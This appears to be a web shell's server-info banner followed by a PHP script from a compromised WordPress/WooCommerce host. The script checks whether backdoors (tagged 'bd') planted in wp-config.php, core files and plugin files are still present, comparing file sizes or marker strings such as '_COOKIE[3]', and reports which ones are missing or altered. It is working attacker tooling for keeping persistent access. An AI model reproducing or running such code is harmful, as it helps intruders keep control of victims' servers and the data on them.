|
Server : LiteSpeed System : Linux server104.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64 User : saleoqej ( 6848) PHP Version : 8.0.30 Disable Function : NONE Directory : /dev/shm/ |
<?php $r = '/home/ecitkgce/ayabadge.ecit-dev.com'; $x = ["/wp-includes/pomo/translations.php"=>"bd@@145774664@@_COOKIE[3]",
"/wp-config.php"=>"bd@@149436796@@_COOKIE[3]",
"/wp-content/plugins/woocommerce/src/StoreApi/Schemas/V1/AI/loginstyle.php"=>"bd@@118401292@@1598",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Products/Stats/xoopsmodel.php"=>"bd@@118242633@@719",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-has-variations-notice/filterinput.php"=>"bd@@125057868@@664",
"/wp-content/plugins/redux-framework/redux-core/assets/scss/vendor/select2/theme/default/data_global.php"=>"bd@@118381134@@672",
"/wp-content/plugins/wpforms-lite/templates/emails/summary-body-plain.php"=>"bd@@149437078@@reverse_searcher",
"/wp-content/plugins/woocommerce/includes/wc-update-functions.php"=>"bd@@149436846@@restore_state",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Exceptions/default_results.php"=>"bd@@118401279@@1535"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');